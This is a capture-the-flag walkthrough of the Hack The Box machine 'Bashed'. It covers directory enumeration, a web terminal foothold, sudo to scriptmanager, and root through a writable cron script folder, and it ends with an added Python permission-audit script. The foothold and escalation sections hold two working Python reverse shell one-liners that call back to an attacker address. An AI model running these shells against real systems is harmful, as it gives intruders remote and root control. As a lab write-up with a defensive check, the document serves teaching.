https://app.hackthebox.com/machines/Bashed
Review
- Directory enumeration reveals a browser-based terminal, which gives initial access.
- Run a Python reverse shell from that terminal to get a user shell on Kali.
- sudo permissions allow running commands as the user “scriptmanager” without specifying a password.
- A cron job running as root executes the .py files in the /scripts folder.
- Create a Python file with a reverse shell in that folder and root access will be gained.
Enumeration
Run an nmap scan to find open ports.

Port 80 shows us the following.

Run a gobuster scan to find hidden directories.

/dev/ gives us the following.

A browser-based Linux terminal.

The user arrexel has the user.txt file.

Foothold
Use a Python reverse shell script to spawn a shell on Kali.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.23",1235));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Start a netcat listener.

sudo -l shows that we are able to use sudo to run commands as scriptmanager.

Spawn a Python shell and use sudo to switch to scriptmanager.

Find the scripts folder.

To check whether it is a cron job, I tried removing the test.txt file but was unable to do so. Rename the file, and after some time a new test.txt file appears.

This machine seems to run the .py files as a cron job, and the job runs as root.
Privilege escalation
Let’s create a new Python script with a reverse shell to our machine.
echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.23",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' > exploit.py

Root shell is gained.

The final flag is found.
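
The root cause of the escalation above is a script directory that a root cron job executes from but that a non-root user can write to. The following audit check is an added example, not part of the original write-up; the function names and the sample directory are hypothetical, and the sample data is constructed in a temporary folder.

```python
import os
import stat
import tempfile


def audit_cron_script_dir(directory, trusted_uids=(0,)):
    """Return findings for a directory whose scripts a privileged cron job runs.

    A finding means someone other than a trusted owner can add or change
    code that the privileged job will execute.
    """
    findings = []
    targets = [directory] + sorted(
        os.path.join(directory, name) for name in os.listdir(directory)
    )
    for path in targets:
        st = os.lstat(path)  # lstat: do not follow symlinks silently
        if stat.S_ISLNK(st.st_mode):
            findings.append((path, "symlink: target is outside this audit"))
            continue
        if st.st_uid not in trusted_uids:
            findings.append((path, "owned by untrusted uid %d" % st.st_uid))
        if st.st_mode & stat.S_IWOTH:
            findings.append((path, "world-writable"))
        if st.st_mode & stat.S_IWGRP:
            findings.append((path, "group-writable (gid %d)" % st.st_gid))
    return findings


def build_sample_dir():
    """Constructed sample: a script directory with loose permissions."""
    root = tempfile.mkdtemp(prefix="scripts-audit-")
    script = os.path.join(root, "test.py")
    with open(script, "w") as fh:
        fh.write("print('hello')\n")
    os.chmod(script, 0o644)
    os.chmod(root, 0o777)  # anyone can drop a new .py file here
    return root


if __name__ == "__main__":
    sample = build_sample_dir()
    # For the demo the current user stands in for the trusted owner; on a
    # real host keep the default trusted_uids=(0,) and pass the cron directory.
    for path, reason in audit_cron_script_dir(sample, trusted_uids=(os.getuid(),)):
        print("%s: %s" % (path, reason))
```

On a real host the check should also be applied to each parent directory of the script folder, since a writable parent lets the folder itself be replaced.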
